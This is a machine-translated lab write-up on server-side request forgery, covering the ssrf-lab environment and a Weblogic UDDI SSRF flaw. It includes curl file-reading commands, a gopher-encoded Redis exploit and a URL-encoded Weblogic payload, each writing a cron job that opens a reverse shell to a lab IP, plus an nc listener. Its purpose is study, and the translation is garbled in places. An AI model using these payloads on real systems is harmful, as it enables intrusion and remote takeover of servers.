Preface:
This article first appeared to the Prophet communities combine vulnerability, ssrf-lab study SSRF Vulnerability
Learn new knowledge, this time by the presence of Weblogic SSRF vulnerabilities and ssrf-lab, to study the vulnerability SSRF
0x00 understand SSRF
SSRF profile:
SSRF(Server-Side Request Forgery)That server-side request forgery, counterfeiting exploit server-initiated requests, thus breaking the client can not obtain data limitations, essentially belongs to the information disclosure vulnerability.
SSRF Vulnerability principle:
SSRFThe causes are mostly due to the server provides the ability to get data from other servers and applications do not have filters and restrictions on the destination address. Such as access from the specified URL address of the web page text, Load picture specified address, download, etc., but also in most of the web server architecture , web server itself can access the Internet and intranet server resides , so an attacker can pass the address to make any back-end server to its initiates a request, and returns the data to the target address of the request
and, in general, the SSRFgoal of the attack is an internal system can not be accessed outside the network (ie network), so SSRF loopholes It can be summed up in one sentence: the use of a network can initiate a request for service as a springboard to attack other internal services
gopher, dict protocol and redis service, Curl command
GopherAgreement can do many things, in particular, can play an important role in many of the SSRF. Using this protocol can attack within the network FTP、Telnet、Redis、Memcache, it can also be GET、POSTrequested.
DICTAgreement, a dictionary server protocol A Dictionary Server Protocolthat allows clients to access more dictionaries in the course of the agreement and server listening port number: 2628.
redisService is in 6379port open
these we generally look to know its usefulness
curl command has a very important role in the SSRF vulnerabilities, so here is a brief introduction to curl command:
curl is commonly used command-line tool, used to request the Web server. Its name is the client (client) tool means of URL
When no parameters, curl is to issue a GET request
$ curl https://www.example.com
The above command to www.example.comissue a GET request, the content server will be returned in the command line output
-vOutput of the entire communication process parameters for debugging. We can use -vthe parameters to read the file
使用file协议curl -v file:///etc/passwd
使用ftp协议 curl -v "ftp://127.0.0.1:端口/info"
使用dict协议 curl -v "dict://127.0.0.1:端口/info"
使用gopher协议 curl -v "gopher://127.0.0.1:端口/_info"
Other parameters can refer to curl
Common IP network segment
LAN address range into three categories, the following IP segment IP network segment:
C类:192.168.0.0 - 192.168.255.255
B类:172.16.0.0 - 172.31.255.255
A类:10.0.0.0 - 10.255.255.255
Mining and use SSRF vulnerabilities:
The presence of SSRFvulnerable sites using four main agreement, namely http、file、gopher、dictthe agreement
fileAgreements read local files
httpprotocol ip scanning within the network, port probes
to detect 6379port is open, you can use http、gopher、dictthese protocols to play an open 6379port redisservices.
As the figure, there is shown in many ways SSRF mining and use only by theory can not understand something, and then practice the following:
0x01 ssrf-lab
OUTGOING WEBHOOK input https://yourhandler.io/eventsis required to monitor REST API test items
in results SEE THE RESULT displayed portion in response to the request and status codes
Following the first test 127.0.0.1, we found echo data, indicating that there is no limit internal network ip
above understanding of the SSRF can read files through several protocols, test it in here:
Use file:///etc/passwdread user passwords, can be found reading
In addition, the use of this protocol can read any file within the host. Then you can easily read the configuration file and the source code for further penetration, here's success is achieved because there is no rigorous URL filtering, so it can use this protocol to read arbitrary files.
In the above also introduced redisthe service, read a lot of SSRFprotocol in use Redis services are combined, so here in the first ssrf-basicsinstallation of the service inside the container
$ docker ps #查看容器编号
$ docker exec -it 容器编号 /bin/bash #进入容器
$ apt-get install redis-server # 安装redis服务
$ redis-server #开启redis服务
After installing, you can use the protocol to gather information and rebound shell
Use dictagreement, dict://127.0.0.1:6379/infocan get local redisservice configuration information
using the dict://127.0.0.1:6379/KEYS *acquired rediscontent storage
that is dictsimple using the protocol, in addition, the use of gopherprotocol can attackredis
Redis exist within the network of unauthorized access vulnerabilities, when Redis service runs with root privileges, use Gopher protocol attacks within the network of Redis, a rebound can be achieved by writing shell regular tasks
First of all first look at Redis command normally attack and then converted into Gopher protocol available
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
//redis-cli查看所有的keys及清空所有的数据
This is common exp, simply change their own IP and port can be, adapted to the changed GopherURL protocol:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
After decoding url is:
gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit
Tested and found echo
Then in ssrf-lab/basicsview inserted inside the container KEY value, verify that the successful
use of Gopherthe protocol can also attack FastCGI, attack within the networkVulnerability Web
Specifically refer to the use of the Gopher protocol expanding the attack surface
0x02: Weblogic SSRF Vulnerability
There is Weblogic in a SSRF vulnerability exploit the vulnerability can send arbitrary HTTP request, and then in the attack network redis, fastcgi and other vulnerable components of
the vulnerability is located in http://192.168.186.130:7001/uddiexplorer//uddiexplorer/SearchPublicRegistries.jsp, Google translate
search private registry, and then there above a public registry, you can choose Microsoft , IBM, which is specified URL address acquisition webpage text content 
just to fill out the content, it found that the request is gET requests and POST requests can be constructed directly next parameter, the specified URL changed a bit and see how the results appear, We must first find out the parameters corresponding to each
constructed parameters:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
Initiating a request, found
accessible port error will be generally returned status code, if a port is not present, it returns could not connect over HTTP to server
this way it can detect the network state
In addition,
WeblogicinSSRFa relatively large features, although it is a "GET" request, but can be passed%0a%0dto inject newline, redis service each command is separated by line breaks, it can be attacked by the SSRF redis server in the network
Since there can be SSRF attack, then by injecting HTTP header, use Redis to rebound shell
First detection by SSRF network of redisservers, tested and found to 172.18.0.2:6379be in communication (as used here docker and to build the dockernetwork environment is generally 172. *, but here it is my request always times out first with the next master pictures)
thus, knowing the docker address environment 172.18.0.2, the port 6379is running Redis service
Then send three rediscommands, the bomb shell script is written /etc/crontab:
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.186.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
GET pass in use, URL encoding
%74%65%73%74%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%36%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%73%61%76%65%61%61%61
Before initiating a request to monitor 4444port
nc -lvp 4444
After the request for a period of time, you can successfully rally the shell
Here the process of reproduction appears a little problem, access http://172.18.0.2:6379/times out, but the purpose of reproduction of this vulnerability but also to learn how to SSRF, a word learned in this position, are also considered not white reproduction.
